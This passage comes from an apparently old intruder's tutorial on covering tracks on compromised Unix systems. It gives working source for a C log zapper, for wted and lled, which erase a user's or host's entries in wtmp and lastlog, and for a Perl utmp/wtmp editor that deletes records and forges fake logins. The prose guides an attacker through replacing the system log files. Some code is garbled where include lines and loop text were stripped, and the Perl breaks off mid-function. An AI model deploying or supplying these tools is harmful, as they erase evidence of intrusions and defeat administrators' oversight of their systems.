              } else {
                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                     bzero((char *)&utmp_ent,sizeof(struct utmp ));
                     lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                     write (f, &utmp_ent, sizeof (utmp_ent));
                     pos = -1L;
                } else pos += 1L;
              }
           }
           close(f);
        }
      }
       
      void kill_lastlog(who)
      char *who;
      {
          struct passwd *pwd;
          struct lastlog newll;
       
           if ((pwd=getpwnam(who))!=NULL) {
       
              if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
                  bzero((char *)&newll,sizeof( newll ));
                  write(f, (char *)&newll, sizeof( newll ));
                  close(f);
              }
       
          } else printf("%s: ?\n",who);
      }
       
      main(argc,argv)
      int argc;
      char *argv[];
      {
          if (argc==2) {
              kill_lastlog(argv[1]);
              kill_wtmp(argv[1]);
              kill_utmp(argv[1]);
              printf("Zap2!\n");
          } else
          printf("Error.\n");
      }
      --------------------------- cut here
      
      ---------------
      Section 5B
      Other scripts
      ---------------
      
      Now we come to the other part of this.  Lets say that after you login, and do
      your z2, you need to ftp in to grab a file. (remember NEVER ftp or telnet out)
      Ok, you ftp in and grab a few files, or login to another account on the system,
      now you will need to use wted.  wted will let you edit the wtmp to remove your
      login from the ftp.  You also might need to use the lled (lastlog edit).
      
      Here is the menu if you type ./wted, after setting log locations & compile:
      
      [8:25pm][/home/compile]wted
      Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
                  -h      This help
                  -f      Use FILE instead of default
                  -a      Show all entries found
                  -u      Show all entries for USER
                  -b      Show NULL entries
                  -e      Erase USER completely
                  -c      Erase all connections containing HOST
                  -z      Show ZAP'd entries
                  -x      Attempt to remove ZAP'd entries completely
      
      So if i ftp to username tsmith I would type wted -x -e tsmith
      
      The program will now prompt you one login at a time for the user tsmith asking
      if you want to delete it.  After you delete your login, make sure to
      chmod 644 the wtmp.tmp file and then copy it over the top of the wtmp file in
      the log directory.  Like this:
      
      1. chmod 644 wtmp.tmp
      2. cp wtmp.tmp /var/adm/wtmp
      
      Here is your wted program:
      
      MAKE SURE TO HAVE THE RIGHT PATH TO THE char file below
      So make sure you have the right path to the wtmp file.
      
      wted.c
      ---------------------- cut here
      #include 
      #include 
      #include 
      #include 
      
      char *file="/var/adm/wtmp";
      
      main(argc,argv)
      int argc;
      char *argv[];
      {
      int i;
      if (argc==1) usage();
      for(i=1;iut_name)) || (name=="*") ||
                      (!(strcmp("Z4p",name)) && (ptr->ut_time==0)))
                              printinfo(ptr);
                      }
              close(fp);
              }
      }
      
      printinfo(ptr)
      struct utmp *ptr;
      {
      char tmpstr[256];
      printf("%s\t",ptr->ut_name);
      printf("%s\t",ptr->ut_line);
      strcpy(tmpstr,ctime(&(ptr->ut_time)));
      tmpstr[strlen(tmpstr)-1]='\0';
      printf("%s\t",tmpstr);
      printf("%s\n",ptr->ut_host);
      }
      
      erase(name,host)
      char *name,*host;
      {
      int fp=-1,fd=-1,tot=0,cnt=0,n=0;
      struct utmp utmp;
      unsigned char c;
      if (fp=open(file,O_RDONLY)) {
              fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
              while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
                      if (host)
                              if (strstr(utmp.ut_host,host)) tot++;
                              else {cnt++;write(fd,&utmp,sizeof(struct utmp));}
                      if (name) {
                      if (strcmp(utmp.ut_name,name)) {cnt++;
                              write(fd,&utmp,sizeof(struct utmp));}
                      else { 
                              if (n>0) {
                                      n--;cnt++;
                                      write(fd,&utmp,sizeof(struct utmp));}
                              else
                              {
                              printinfo(&utmp);
                              printf("Erase entry (y/n/f(astforward))? ");
                              c='a';
                              while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
                              if (c=='f') {
                                      cnt++;
                                      write(fd,&utmp,sizeof(struct utmp));
                                      printf("Fast forward how many entries? ");
                                      scanf("%d",&n);}
                              if (c=='n') {
                                      cnt++;
                                      write(fd,&utmp,sizeof(struct utmp));
                                      }
                              if (c=='y') tot++;
                              } 
                            } }                                       
              }
              close(fp);
              close(fd);
              }
      printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
      printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
      }
      
      remnull(name)
      char *name;
      {
      int fp=-1,fd=-1,tot=0,cnt=0,n=0;
      struct utmp utmp;
      if (fp=open(file,O_RDONLY)) {
              fd=open("wtmp.tmp",O_WRONLY|O_CREAT);
              while (read(fp,&utmp,sizeof(struct utmp))==sizeof(struct utmp)) {
                      if (utmp.ut_time) {
                              cnt++;
                              write(fd,&utmp,sizeof(struct utmp));
                      }
                      else
                              tot++;
              }
              close(fp);
              close(fd);
              }
      printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
      printf("Now chmod wtmp.tmp and copy over the original %s\n",file);
      }
      
      usage()
      {
      printf("Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
      printf("\t-h\tThis help\n");
      printf("\t-f\tUse FILE instead of default\n");
      printf("\t-a\tShow all entries found\n");
      printf("\t-u\tShow all entries for USER\n");
      printf("\t-b\tShow NULL entries\n"); 
      printf("\t-e\tErase USER completely\n");
      printf("\t-c\tErase all connections containing HOST\n");
      printf("\t-z\tShow ZAP'd entries\n");
      printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
      }
      ---------------------- cut here
      
      You might also have to clean stuff out of the file /vat/adm/lastlog
      
      For this use the lled.c.  Compile the program and name it lled.
      
      Here is a menu from the program when you type ./lled
      
      [4:04am][/home/paris/compile]lled
      Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST
      -h      This help
      -f      Use FILE instead of default
      -a      Show all entries found
      -u      Show all entries for USER
      -b      Show NULL entries
      -e      Erase USER completely
      -c      Erase all connections containing HOST
      -z      Show ZAP'd entries
      -x      Attempt to remove ZAP'd entries completely
      
      It would be good to try to view first using -u, but many times it will not
      show your username in the lastlog, but it will still have your host, so I
      have found that if you know what to look for you can just type something like:
      If my host name that I was coming from was machine.edit.com, I could type
      
      lled -e username -c machine.edit
      
      If you need to view the lastlog your host entry should be at the end of the
      file, just type: lled -a
      
      chmod the file lastlog.tmp 644 and copy the file over the top of the lastlog
      file in the log directory just like you did above for the wted.
      
      BE SURE TO SET THE PATH FOR YOUR lastlog below!
      
      Ok here is your lled.c
      -------------------------- cut here
      #include 
      #include 
      #include 
      #include 
      
      char *file="/var/adm/lastlog";
      
      main(argc,argv)
      int argc;
      char *argv[];
      {
      int i;
      if (argc==1) usage();
      for(i=1;ill_line)) || (name=="*") ||
                      (!(strcmp("Z4p",name)) && (ptr->ll_time==0)))
                              printinfo(ptr);
                      }
              close(fp);
              }
      }
      
      printinfo(ptr)
      struct lastlog *ptr;
      {
      char tmpstr[256];
      printf("%s\t",ptr->ll_line);
      strcpy(tmpstr,ctime(&(ptr->ll_time)));
      tmpstr[strlen(tmpstr)-1]='\0';
      printf("%s\t",tmpstr);
      printf("%s\n",ptr->ll_host);
      }
      
      erase(name,host)
      char *name,*host;
      {
      int fp=-1,fd=-1,tot=0,cnt=0,n=0;
      struct lastlog utmp;
      unsigned char c;
      if (fp=open(file,O_RDONLY)) {
              fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
              while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
                      if (host)
                              if (strstr(utmp.ll_host,host)) tot++;
                              else {cnt++;write(fd,&utmp,sizeof(struct lastlog));}
                      if (name) {
                      if (strcmp(utmp.ll_line,name)) {cnt++;
                              write(fd,&utmp,sizeof(struct lastlog));}
                      else { 
                              if (n>0) {
                                      n--;cnt++;
                                      write(fd,&utmp,sizeof(struct lastlog));}
                              else
                              {
                              printinfo(&utmp);
                              printf("Erase entry (y/n/f(astforward))? ");
                              c='a';
                              while (c!='y'&&c!='n'&&c!='f') c=getc(stdin);
                              if (c=='f') {
                                      cnt++;
                                      write(fd,&utmp,sizeof(struct lastlog));
                                      printf("Fast forward how many entries? ");
                                      scanf("%d",&n);}
                              if (c=='n') {
                                      cnt++;
                                      write(fd,&utmp,sizeof(struct lastlog));
                                      }
                              if (c=='y') tot++;
                              } 
                            } }                                       
              }
              close(fp);
              close(fd);
              }
      printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
      printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
      }
      
      remnull(name)
      char *name;
      {
      int fp=-1,fd=-1,tot=0,cnt=0,n=0;
      struct lastlog utmp;
      if (fp=open(file,O_RDONLY)) {
              fd=open("lastlog.tmp",O_WRONLY|O_CREAT);
              while (read(fp,&utmp,sizeof(struct lastlog))==sizeof(struct lastlog)) {
                      if (utmp.ll_time) {
                              cnt++;
                              write(fd,&utmp,sizeof(struct lastlog));
                      }
                      else
                              tot++;
              }
              close(fp);
              close(fd);
              }
      printf("Entries stored: %d Entries removed: %d\n",cnt,tot);
      printf("Now chmod lastlog.tmp and copy over the original %s\n",file);
      }
      
      usage()
      {
      printf("Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST\n");
      printf("\t-h\tThis help\n");
      printf("\t-f\tUse FILE instead of default\n");
      printf("\t-a\tShow all entries found\n");
      printf("\t-u\tShow all entries for USER\n");
      printf("\t-b\tShow NULL entries\n"); 
      printf("\t-e\tErase USER completely\n");
      printf("\t-c\tErase all connections containing HOST\n");
      printf("\t-z\tShow ZAP'd entries\n");
      printf("\t-x\tAttempt to remove ZAP'd entries completely\n");
      }
      ---------------------------------------------------------------- cut here
      
      A good perl script for editing utmp, wtmp, and checking processes.
      It will also let you insert lines in wtmp.  So if you need to play you
      can add clinton.whitehouse.gov logging into port ttyp3 and show he stayed
      on the system for a few hours!
      
      Running 'check' will let you know if someone is on the system and not showing
      up in the utmp log.  Admins like to hide the fact that they are online
      sometimes.  This will allow you to see their connection.  You must be root to
      run the script, and they need perl 5.003+ on thier system.  After starting
      the script just type help.
      
      Here are some of the basic commands:
      
      starts by loading wtmp
      
      delete user username
      delete host hostanme
      write
      
      read wtmp
      delete user username
      delete host hostname
      write
      
      do help for the rest ... the best wtmp,wtmp editor around!
      
      Say thankyou i-e ;)
      
      -----------------------start of utmpman.pl
      #!/usr/bin/perl -w
      #
      # Variable defines.
      my($utmp_location) = "/var/run/utmp";
      my($wtmp_location) = "/var/log/wtmp";
      my($shells_location) = "/etc/shells";
      my($ttybase) = "tty";
      my($ttyrange) = "pqrs";                 # TTYrange standard on most linux systems.
      my($ttyports) = "012345657689abcfef";   # TTYports standard on most linux systems.
      
      # Global initializations.
      my($active_file) = "";
      my(%entries) = {};
      my(@cmdline) = ();
      my(@shells) = ();
      
      # Display banner.
      print "\nutmp Manager v0.8\n\n";
      
      # Access check.
      die("utmpman :: You must be root to run this application!\n") unless ($> == 0);
      
      # Read in valid shells.
      if (defined($shells_location)) {
        open(SHELLFILE, "<$shells_location");
        @shells = ;
        close(SHELLFILE);
      }
      # Process "basename" of each shell.
      @shells = map( { /([^\/\n]+)\n*$/; $1; } @shells);
                                       
      print push(@shells) . " valid shells in $shells_location: @shells\n" if (defined(@shells));
      readfile("$utmp_location");
      print("\nutmpman: $active_file> ");
      while () {
        process_cmd(split);
        print("\nutmpman: $active_file> ");
      }
      
      sub process_cmd {
        return if (!defined(@_));
        my(@line) = map { lc($_) } @_;
        
        $_ = shift(@line);
        SWITCH: {
              /^check$/     && do {
                                 check_func(@line);
                                 last SWITCH;
                               };
      
              /^delete$/    && do {
                                 del_func(@line);
                                 last SWITCH;
                               };  
                               
              /^help$/      && do {
                                 help_func();
                                 last SWITCH;          
                               };
                                            
              /^insert$/    && do {
                                 ins_func(@line);
                                 last SWITCH;
                               }; 
                                            
              /^list$/      && do {
                                 list_func(@line);
                                 last SWITCH;
                               };
      
              /^read$/      && do {
                                 read_func(@line);
                                 last SWITCH;
                               };
                                                                                                    
              /^write$/     && do {
                                 write_func(@line);
                                 last SWITCH;
                               };              
                                                          
              /^quit|exit$/ && exit(0);
              
              # DEFAULT. 
              print ("Invalid command.\n");       
        }
      }
      
      
      # HELP
      
      sub help_func {
        print << "EOM";
      
      utmpManager Help
      ----------------
      
      Note: -  is an argument.
            - [id=] is a token which expects a value as part of command
              (ie, insert id=p5 user=root 11/23/96). See the insert command.
            - A line is the full name to the tty port, ie ttyp0.
            - An id is the *unique* representation of the port
              (without the tty, etc), ie "p0" (for ttyp0).
      
        check
          - Perform user consistancy check. Use this to make sure that the data in
            utmp agrees with who is actually on the machine. This is useful in
            determining if a user is online with hidden ports, running nohup'd
            processes, or running iScreen.
      
        delete -
          - Delete entries #x to #y.
      
        delete host 
          - Delete *all* entries which match the substring .
      
        delete line|id 
          - Delete entry containing  or .
      
        insert {id=|line=} [type=] [user=] [host=] [ConnTime] {LogoffTime}
          - Insert an entry into utmp/wtmp files specifying any combination
            of id/line, type, username, host, connection time, and logoff time.
            (LogoffTime only valid for WTMP files.)
      
        list host 
          - List all entries matching the substring .
      
        list line|id 
          - List all entries matching  or .
      
        read utmp|wtmp|
          - Read entries from either default wtmp, default utmp, or an arbitrary
            filename. Note: arbitrary filenames MUST start with either "utmp" or
            "wtmp" to be used with this editor. Rename files *outside* of this
            editor if necessary. If read is executed without any arguments, it
            rereads the last given filename, which is displayed on the prompt.
      
        write {filename}
          - Write entries to file {filename}. If write is executed without any
            arguments, then entries will be written to the last given filename,
            which is displayed on the prompt.
      
      EOM
      }
      
      # DELETE
      
      sub del_func {
        my(@params) = @_;
      
        if (!push(@_)) {
          print("delete :: Not enough parameters. See \"help\" for syntax.\n");
          return undef;
        } elsif ($params[0] =~ /host|user|id|line/) {
          del_by_data(@_);
        } elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
          del_by_range($params[0]);
        } elsif ($params[0] =~ m/^(\d+)$/) {
          del_by_range("$1-$1");
        }
        
        # Renumber list after delete operation.
        resync();
      }
      
      
      sub del_by_range {
        my($range)=shift;
        $range =~ m/(\d+)*-(\d+)*/;
        my($lo, $hi, $count)=($1, $2, 0);
        
        $lo = 0 if (!defined($lo));
        $hi = scalar(keys(%entries)) if (!defined($hi));
        
        foreach (sort( { $a <=> $b } keys(%entries))) {
          if (($_ >= $lo) && ($_ <= $hi)) {
            delete($entries{$_});
            $count++;
          }
        }
        print "$count entries deleted.\n";
      }               
      
      
      sub del_by_data {
        my($op, $data) = @_;
        my($count) = 0;
      
        if ((length($data) < 5) && ($op eq "host")) {
          print "Must specify at least 5 characters for delete hostmask.\n";
          return undef;
        } elsif (((length($data) > 4) && ($op eq "id"))||
                 ((length($data) > 11) && ($op eq "line"))) {
          print "Invalid $op specified.\n";
          return undef;
        }
        # Note: If we are deleting by user, then user must match, *exactly*!
        $data = "^" . pack("a8", $data) . "\$" if ($op eq "user");
        foreach (sort( { $a <=> $b } keys(%entries))) {
          if (%{$entries{$_}}->{$op} =~ m/$data/i) {
            delete($entries{$_});
            ++$count;
          }
        }
        if (!$count) {
          print "No $op entries matching $data.\n";
        } else {
          print "$count entries deleted.\n";
        }
      }
      
      
      # INSERT
      
      # Date1 Time1 = DateTime1 => mm/dd/[cc]yy[:hh:mm[:ss]]
      # Date2 Time2 = DateTime2 => (see above)
      # user=
      # host=
      # id= | line=
      #
      # utmp:
      # insert {id=|line=} [type=] [user=] [host=] [DateTime]
      # wtmp:
      # insert {id=|line=} [user=] [host=] [DateTime1] {DateTime2}
      
      sub ins_func {
        my(%cmdopt)={};
        my($datetime1, $datetime2, $gmdate, $gmdate2);
      
        # Get random pid out of the way.
        $cmdopt{"pid"} = int(rand(32656)+100);
        $cmdopt{"addr"} = pack("a4", "");
      
        # Get command options.
        foreach (@_) {
          if (/=/) {
            local($key, $value)=split(/=/);
            $cmdopt{$key} = $value;
          } else {
            if (!defined($datetime1)) {
              $datetime1 = $_;
              next;
            }
            if (!defined($datetime2)) {
              $datetime2 = $_ ;
              next;
            }
            print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
            return undef;
          }
        }
      
        # Check for an illegal pair or illegal option.
        foreach (keys(%cmdopt)) {
          if (!(/^host|id|line|type|user|addr$/)) {
            print "insert :: Invalid options specified. Please see \"help\" for syntax.\n";
            return undef;
          }
          if (($_ eq "last") && ($active_file !~  m!/*utmp[^/]*$!i)) {
            print "insert :: LAST option only valid for utmp files.\n";
            return undef;
          }     
        }
      
        # Get date in seconds since 1970.
        $gmdate = SecsSince1970($datetime1);
      
        # Get ending date in seconds since 1970.
        $gmdate2 = SecsSince1970($datetime2) if (defined($datetime2));
      
        if (!defined($gmdate) || (!defined($gmdate2) && defined($datetime2))) {
          print "insert :: Invalid date specified.\n";
          return undef;
        }
      
        if (defined($gmdate2)) {
          if ($gmdate2 < $gmdate) {
            print "insert :: First date/time must be *later* than second date/time.\n";
            return undef;
          }
        }
      
        if (defined($cmdopt{"id"}) && defined($cmdopt{"line"})) {
          print "insert :: Insert by LINE or ID only. Please do not specify both.\n";
          return undef;
        }
      
        my($op);
      
        if (!defined($cmdopt{"id"})) {
          $cmdopt{"id"} = $cmdopt{"line"};
          $op = "line";
          if (!($cmdopt{"id"} =~ s/^$ttybase//)) { 
            print "insert :: Invalid line specified.\n"; 
            return undef; 
          }
        } else {
          $cmdopt{"line"} = $ttybase . $cmdopt{"id"};
          $op = "id";
        } 
      
        if (!(defined($cmdopt{"line"}) || defined($cmdopt{"id"}))) {
          print "insert :: Neither LINE nor ID value found. See \"help\" for syntax.\n";
          return undef;
        }
          
        my($searchdata) = ($active_file =~ m!/*utmp[^/]*$!i) ?  
          (pack(($op eq "line") ? "a12" : "a4", $cmdopt{$op})):$cmdopt{$op};
        my($epos1, $npos1, $epos2, $npos2) = ();
        my($oldpos, $count)=("", 0);
      
        foreach (sort( { $a <=> $b } keys(%entries))) {
          if ($active_file =~ m!/*utmp[^/]*$!i) {
            # Handle utmp insertion by line insertion.
            if (%{$entries{$_}}->{$op} eq $searchdata) {
              printf ("insert :: $op $searchdata already exists at position $_\n");
              # This needs to check every option in %cmdopt for defined or null.
              $count = 0;
              foreach (qw(user host time)) {
                if (defined($cmdopt{$_})) {
                  $count++ if ($cmdopt{$_} ne "");
                }
              }
              if (!$count) {
                printf ("insert :: No other data specified. Entry unchanged.\n");
                return undef;
              }
              last;
            }
          } else {
            # Handle wtmp insertion by time position. (Messy)
            $epos1 = $oldpos if (defined($npos1) && !defined($epos1));
            $npos1 = $_ if (%{$entries{$_}}->{"time"} > $gmdate);
            last if (!defined($gmdate2) && defined($epos1));
            $epos2 = $oldpos if (defined($npos2)); 
            $npos2 = $_ if (%{$entries{$_}}->{"time"} > $gmtime2);
            last if (defined($epos2));
          }
          $oldpos = $_;
        }
      
        # Set any unspecified defaults.
        $cmdopt{"user"} = pack("a8", "")  if !defined($cmdopt{"user"});
        $cmdopt{"host"} = pack("a16", "") if !defined($cmdopt{"host"});
        $cmdopt{"type"} = 7               if !defined($cmdopt{"type"});
      
        # Determine end of list insertion positions. (IE, dates entered are after
        # dates in wtmp file or line/id not found in utmp file.
        $epos1 = (scalar(keys(%entries)) + 1) if (!defined($npos1));
        if (defined($datetime2)) {
          $epos2 = (scalar(keys(%entries)) + 1) if (!defined($npos2));
          ++$epos2 if (defined($gmtime2) && !defined($npos1));
        }
      
        # Parse insert data and insert entry.
        $epos1 = sprintf("%7.3f", ($npos1 - $epos1)/2) if (defined($npos1));
        $epos2 = sprintf("%7.3f", ($npos2 - $epos2)/2)
          if (defined($npos2) && defined($gmdate2));
      
        # Insert first entry.
        $cmdopt{"time"} = $gmdate;  
        @{$entries{$epos1}}{qw(type pid line id time user host addr)} = 
                 @{%cmdopt}{qw(type pid line id time user host addr)};
      
        if (defined($epos2)) {
          $cmdopt{"user"} = pack("a8", "");
          $cmdopt{"host"} = pack("a16","");
          $cmdopt{"id"}   = pack("a4", "");
          $cmdopt{"time"} = $gmdate2;
       
          @{$entries{$epos2}}{qw(type pid line id time user host addr)} =
                   @{%cmdopt}{qw(type pid line id time user host addr)};
        }
      
        resync();
      }
      
      
      # LIST
      
      sub list_func {
        my(@params) = @_;
      
        if (!push(@_) || ($params[0] eq "all")) {
          list_by_range("-");
          return 0;
        } elsif ($params[0] =~ /^host|user|id|line$/) {
          list_by_data(@_);
          return 0;
        } elsif ($params[0] =~ m/\d*-\d+|\d+-\d*/) {
          list_by_range($params[0]);
          return 0;
        } elsif ($params[0] =~ m/^(\d+)$/) {
          list_by_range("$1-$1");
          return 0;
        }
                                
        print ("list :: Error in parameters. See \"help\" for syntax.\n");
        return undef;
      }    
      
      
      sub list_by_data {
        my($op, $data) = @_;
        my($count) = 0;
      
        foreach (sort( {$a <=> $b} keys(%entries))) {
          if (%{$entries{$_}}->{$op} =~ m/$data/i) {
            list_entry($_);
            ++$count;
          }
        }
        print "No $op entries matching $data.\n" if (!$count);
      }
      
      
      sub list_by_range {
        my($range)=shift;
        $range =~ m/(\d+)*-(\d+)*/;
        my($lo, $hi)=($1, $2);
        
        $lo = 0 if (!defined($lo));
        $hi = scalar(keys(%entries)) if (!defined($hi));
        
        foreach (sort( { $a <=> $b } keys(%entries))) {
          if (($_ >= $lo) && ($_ <= $hi)) {
            list_entry($_);
          }
        }
      }               
      
      
      sub list_entry {
        printf("#%3d - " . gmtime(%{$entries{$_}}->{"time"}), $_);
        printf("  %s/%s", @{$entries{$_}}{qw(id line)});
        printf(": %s ", %{$entries{$_}}->{"user"})
          if (%{$entries{$_}}->{"user"} ne pack("a8", ""));
        printf("from %s", %{$entries{$_}}->{"host"}) 
          if (%{$entries{$_}}->{"host"} ne pack("a16", ""));
        if (%{$entries{$_}}->{"addr"} ne "\0\0\0\0") {
          printf(" (%s)", longtodot4(%{$entries{$_}}->{"addr"}));
        }
        print ("\n");
        printf("%7sPID = %u\n", "", %{$entries{$_}}->{"pid"}) 
          if (%{$entries{$_}}->{"pid"} && (%{$entries{$_}}->{"user"} ne pack("a8","")));
      }
      
      #  printf "#$_ - %s %s/%s: %s from %s\n", @{$v}->{qw(time id line user host)};
      #  now *that's* cool :-)
      #  should be like this: @{$v}{qw(time id line user host)}
      #  I had an extra -> in my first version.
      #
      # Or course, it's changed since then, but - "Thanks, Sil!" :)
      #
      
      
      # READ
      
      
      sub read_func {
        my($arg)=shift;
        
        $arg = $utmp_location if ($arg eq "utmp");
        $arg = $wtmp_location if ($arg eq "wtmp");
        $arg = $active_file if (!defined($arg));
        
        if ($arg !~ m!/*[uw]tmp[^/]*$!) {
          print("read :: Filenames *must* start with either 'wtmp' or 'utmp' to be edited.\n");
          return undef;
        }
        
        readfile($arg);
      }
         
      
      # WRITE
      
      sub write_func {
        my($file)=shift;
        my($count)=0;
        
        $file = $active_file if (!defined($file));
        if ($file !~ m!/*[uw]tmp[^/]*$!) {
          print ("write :: File must start with 'utmp' or 'wtmp'.\nRename file outside this program.\n");
          return undef;
        }
        if (!open(OUTFILE, ">$file")) {
          print ("write :: Can't open $file for output.\n");
          return undef;
        }
        binmode(OUTFILE);
        
        foreach (sort( { $a <=> $b } keys(%entries))) {
          printf OUTFILE ("%s", pack("i L a12 a4 L a8 a16 a4", 
            @{$entries{$_}}{qw(type pid line id time user host addr)}));
          $count++;
        }
        print ("$active_file: " . scalar(keys(%entries)) . " entries written.\n");
        close(OUTFILE);
      }               
      
      
      # CHECK
      
      sub check_func {
        if (push(@_)) {
          print "check :: Invalid options specified. Please see \"help\"\n";
          return undef;
        }
        if ($active_file !~ m!/*utmp[^/]*$!) {
          print "check :: Command can only be run on utmp files.\n";
          return undef;
        }
        
        # Build struct of ports containing port name, device num and owner.
        # Note: Test run in grepstr may *not* be portable for all Unix
        #       types. Be forewarned! This was designed for Linux.
        # Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$/
        #       should return the same as what you expect in "struct utmp->ut_id".
        my($grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$";
        my(%ports) = {};
        my($user, $rdev) = ();
      
        opendir(DEVDIR, "/dev");
        my(@devfiles) = readdir(DEVDIR);
        @devfiles = grep(/$grepstr/, @devfiles);  
        close(DEVDIR);
        foreach (@devfiles) {
          /^$ttybase([$ttyrange][$ttyports])$/;
          if (!defined($1)) {
            print "check :: Warning! Could not extract port ID from $_.\n";
          } else {
            ($user, $rdev) = (stat("/dev/$_"))[4, 6];
            $user = getpwuid($user);
            $ports{$1} = newport($_, $rdev, $user);
          } 
        }
        
        # Check ownership of /dev ports.
        my(@logdev)=();
        foreach (sort(keys(%ports))) {
          push(@logdev, $_) if (%{$ports{$_}}->{"owner"} ne "root");
        }
        @logdev = sort(@logdev);
            
        # Check utmp (against ports detected as logged in);
        my(@logutmp)=();
        foreach (sort( { $a <=> $b } keys(%entries))) {
          if (defined(%{$entries{$_}}->{"user"}) && defined(%{$entries{$_}}->{"host"}) &&
              defined(%{$entries{$_}}->{"id"})   && defined(%{$entries{$_}}->{"pid"})) {
            push(@logutmp, %{$entries{$_}}->{"id"})  
              if ((%{$entries{$_}}->{"id"} =~ /[$ttyrange][$ttyports]/) &&
                  ((%{$entries{$_}}->{"user"} ne pack("a8", "")) ||
                  ((%{$entries{$_}}->{"host"} ne pack("a16", "")) &&
                   (%{$entries{$_}}->{"id"} ne pack("a4", "")) &&
                   (%{$entries{$_}}->{"line"} ne pack("a12", "")) &&
                   (%{$entries{$_}}->{"pid"} > 0))));
          }
        }
        @logutmp = sort(@logutmp);
      
        # Check PIDs (find processes with active port ids)
        opendir(PIDDIR, "/proc");
        my(%processes) = {};
        my(@portprocesses) = ();
        foreach (grep(/\d+/, readdir(PIDDIR))) {
          local($procdata, $cmdline);
          open(PROCFILE, ";
          close(PROCFILE);
          if (-e "/proc/$_/stat") {
            local($cmdline, $devnum, $portid);
            ($cmd, $devnum) = (split(/ /, $procdata))[1, 6];
            # Remove surrouding () from command name.
            $cmd =~ s/[\(\)]//g;
            $portid = dev2id(\%ports, $devnum);
            if (defined($portid)) {
              push(@portprocesses, $portid)
                if (!defined(listpos(\@portprocesses, $portid))&&($$ != $_));
              $processes{$_} = newproc($cmd, $portid) if (defined($portid) && ($$ != $_));
            }
          }
        }
        close(PIDDIR);
      
        # A port is *not* logged in if there is no dev entry for port, no utmp entry
        # and no active processes.
        my(@validshellports) = ();
        foreach (sort( { $a <=> $b} keys(%processes))) {
          push(@validshellports, %{$processes{$_}}->{"port"}) 
            if (defined(listpos(\@shells, %{$processes{$_}}->{"cmd"}))&&
                !defined(listpos(\@validshellports, %{$processes{$_}}->{"port"})));
        }
        # Remove ports with valid shells from list of ports with active processes.
        my(@noshellports) = 
          sort(grep(!defined(listpos(\@validshellports, $_)), @portprocesses));
        @validshellports = sort(@validshellports);
        print "Ports with active /dev files: @logdev\n"
          if (defined(@logdev));
        print "Ports with utmp entries: @logutmp\n"
          if (defined(@logutmp));
        print "Ports with valid shells: @validshellports\n" 
          if (defined(@validshellports));
        print "Ports with active processes and *no* shells: @noshellports\n" 
          if (defined(@noshellports));
      }  
        
          
      # GENERAL
      
      sub readfile {
        local($file);
        $file = shift;
        my($index)=1;
        my($buffer)="";
      
        # Insure we have a clean hash table before we start reading in the file.
        foreach (keys(%entries)) {
          undef(%{$entries{$_}});
          delete(${entries{$_}});
        }
          
        open(UTMPFILE, "<$file") || die("utmp-parse: Can't open $file - $!\n");
        binmode(UTMPFILE);
        # 1/17/96, struct utmp is 56 bytes (54 according to addition! :P).  
        while (read(UTMPFILE, $buffer, 56)) {
          $entries{$index++} = newutmp($buffer);
        }
        $active_file = $file;
        print ("$active_file: " . scalar(keys(%entries)) . " entries loaded.\n");
        close(UTMPFILE);
      }
      
      
      sub newutmp {
        my($newbuff) = shift;
        my($longaddr) = 0;
        
        $newnode = bless { 
          "type" => undef, "pid" => undef,  "line" => undef, "id"   => undef,
          "time" => undef, "user" => undef, "host" => undef, "addr" => undef
        }, 'UTMPNODE';
        
        @{$newnode}{qw(type pid line id time user host addr)}=
          unpack("i L a12 a4 L a8 a16 a4", $newbuff);
                                   
        return $newnode;
      }  
      
      
      sub newport {
       
        $newnode = bless {
          "port" => undef, "rdev" => undef, "owner" => undef, "cmd" => undef,
        }, 'PORTNODE';
        
        @{$newnode}{qw(port rdev owner)} = @_;
        
        return $newnode;
      }
      
      
      sub newproc {
       
        $newnode = bless {
          "cmd" => undef, "port" => undef, 
        }, 'PROCNODE';
        
        @{$newnode}{qw(cmd port)} = @_;
        
        return $newnode;
      }
      
      
      # Renumber hashes to default order.
      sub resync {
        my(%newhash) = ();
        my($count)=0;
      
        # Write ordered list in to temporary hash, deleting as we go.
        foreach (sort( {$a <=> $b} keys(%entries))) {
          $newhash{++$count} = $entries{$_};
          delete($entries{$_});
        }
      
        # Copy elements back in to original hash table.
        foreach (sort( {$a <=> $b} keys(%newhash))) {
          $entries{$_} = $newhash{$_};
        }
      }
      
      
      sub longtodot4 {
        my($addr)=shift;
      
        return join(".", map( ord($_), split(//, $addr)));
      }
      
      sub dev2id {
        my($portlist, $rdev) = @_;
      
        foreach (sort(keys(%{$portlist}))) {
          return $_ if (%{$portlist}->{$_}->{"rdev"}==$rdev);
        }                               
        return undef;
      }
      
      
      sub listpos {
        my($arrayref, $search) = @_;
        my($count) = 0;
      
      $^W = 0;
        foreach (@{$arrayref}) {
          return $count if ($search eq ${$arrayref}[$count]);
          $count++;
        }
      $^W = 1;
      
        return undef;
      }
      
      
      ### DATE ROUTINES
      
      # The following code taken & modified from the Date::Manip package.
      # Here is his copyright:
      #
      ## Copyright (c) 1995,1996 Sullivan Beck. All rights reserved.
      ## This program is free software; you can redistribute it and/or modify it
      ## under the same terms as Perl itself.
      
      
      sub SecsSince1970 {
      # Parse as mm/dd/[cc]yy[:hh:mm[:ss]]
        my($datetime) = shift;
